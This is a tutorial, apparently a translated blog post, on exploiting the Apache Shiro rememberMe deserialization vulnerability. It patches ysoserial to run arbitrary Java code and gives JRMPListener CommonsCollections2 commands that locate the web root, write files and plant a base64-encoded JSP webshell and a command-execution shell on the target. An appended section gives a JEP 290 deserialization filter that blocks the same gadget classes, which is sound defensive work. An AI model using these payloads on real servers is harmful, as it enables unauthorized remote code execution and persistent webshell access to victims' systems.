Writing a webshell through the Shiro rememberMe deserialization vulnerability

Modifying ysoserial so it can generate payloads that execute Java code
The original code:

    String cmd = "java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") + "\");";
Change it to the code below. When ysoserial is invoked with a command argument that starts with code:, the rest of the argument is executed as Java code; otherwise it is executed as a system command as before.

    String cmd = "";
    if (!command.startsWith("code:")) {
        cmd = "java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") + "\");";
    } else {
        System.err.println("Java Code Mode:" + command.substring(5)); // print on stderr so the payload written to stdout is not polluted
        cmd = command.substring(5);
    }
Then rebuild ysoserial with mvn.
Getting the web root path

    java -cp ys.jar ysoserial.exploit.JRMPListener 65005 CommonsCollections2 "code:String p = Thread.currentThread().getContextClassLoader().getResource(\"../../\").getPath();String shellpath =p+\"/pw.txt\";java.io.FileOutputStream fos = new java.io.FileOutputStream(shellpath);java.io.OutputStreamWriter osw = new java.io.OutputStreamWriter(fos);osw.write(p);osw.close();"
Writing a file into the web directory

    java -cp ys.jar ysoserial.exploit.JRMPListener 65005 CommonsCollections2 "code:String p = Thread.currentThread().getContextClassLoader().getResource(\"../../\").getPath();String shellpath =p+\"/pw.txt\";java.io.FileOutputStream fos = new java.io.FileOutputStream(shellpath);java.io.OutputStreamWriter osw = new java.io.OutputStreamWriter(fos);osw.write(p);osw.close();"
Writing the webshell

    java -cp ys.jar ysoserial.exploit.JRMPListener 65005 CommonsCollections2 "code:String p = Thread.currentThread().getContextClassLoader().getResource(\"../../\").getPath();String shellpath =p+\"/64.jsp\";String shellcontent = \"\";org.apache.commons.codec.binary.Base64 base64 = new org.apache.commons.codec.binary.Base64();String b64shell = new String(base64.decodeBase64(shellcontent.getBytes()));String tmp = java.net.URLDecoder.decode(b64shell, \"UTF-8\");java.io.FileOutputStream fos = new java.io.FileOutputStream(shellpath);java.io.OutputStreamWriter osw = new java.io.OutputStreamWriter(fos);osw.write(tmp);osw.close();"
Writing a command-execution shell

    java -cp ys.jar ysoserial.exploit.JRMPListener 65005 CommonsCollections2 "code:String p = Thread.currentThread().getContextClassLoader().getResource(\"../../\").getPath();String shellpath =p+\"/64.jsp\";String shellcontent = \"...\";org.apache.commons.codec.binary.Base64 base64 = new org.apache.commons.codec.binary.Base64();String b64shell = new String(base64.decodeBase64(shellcontent.getBytes()));String tmp = java.net.URLDecoder.decode(b64shell, \"UTF-8\");java.io.FileOutputStream fos = new java.io.FileOutputStream(shellpath);java.io.OutputStreamWriter osw = new java.io.OutputStreamWriter(fos);osw.write(tmp);osw.close();"
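Added here from the defender's side, and not code from the original post, from ysoserial or from Shiro: a JEP 290 deserialization filter (Java 9+ assumed) for whatever deserializes the decrypted rememberMe cookie. It rejects the class families the CommonsCollections2 chain above depends on (TemplatesImpl, commons-collections, javassist) and allows only what a rememberMe principal is assumed to contain; the allow patterns, the depth limit and the two sample objects are assumptions constructed for the demo.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.ArrayList;
import java.util.List;

/* Added example, not from the original post, ysoserial or Shiro. Requires Java 9+. */
public class RememberMeFilterDemo {
    // Pattern syntax: '!' rejects, "pkg.**" matches a package and its subpackages,
    // "pkg.*" matches one package only; the final "!*" rejects everything not listed.
    static final String PATTERN = String.join(";",
        "!com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", // class whose bytecode the injected Java code lives in
        "!org.apache.commons.collections.**",   // commons-collections 3.x gadget classes
        "!org.apache.commons.collections4.**",  // commons-collections 4.x gadget classes (CommonsCollections2)
        "!javassist.**",
        "maxdepth=10",                          // assumed bound: a principal collection is shallow
        "org.apache.shiro.subject.**",          // assumed: the Shiro principal collection classes
        "java.util.*",
        "java.lang.*",
        "!*");
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(PATTERN);

    /** Deserialize with the filter set on the stream; null means the filter rejected a class. */
    static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(FILTER); // must be set before the first readObject()
            return ois.readObject();
        } catch (InvalidClassException rejected) {
            System.err.println("rejected: " + rejected.getMessage()); // "filter status: REJECTED"
            return null;
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(o); }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: the shape of a legitimate rememberMe principal list.
        List<String> principals = new ArrayList<>(List.of("alice"));
        System.out.println("legit  -> " + readFiltered(serialize(principals)));
        // Constructed sample: any class outside the allowlist (here java.math.BigInteger) is
        // refused when its class descriptor is read, before any readObject() of that class runs.
        System.out.println("denied -> " + readFiltered(serialize(java.math.BigInteger.ONE)));
    }
}
```

The same pattern string can be installed JVM-wide with the jdk.serialFilter system property, which also covers deserialization points the application code does not wrap itself.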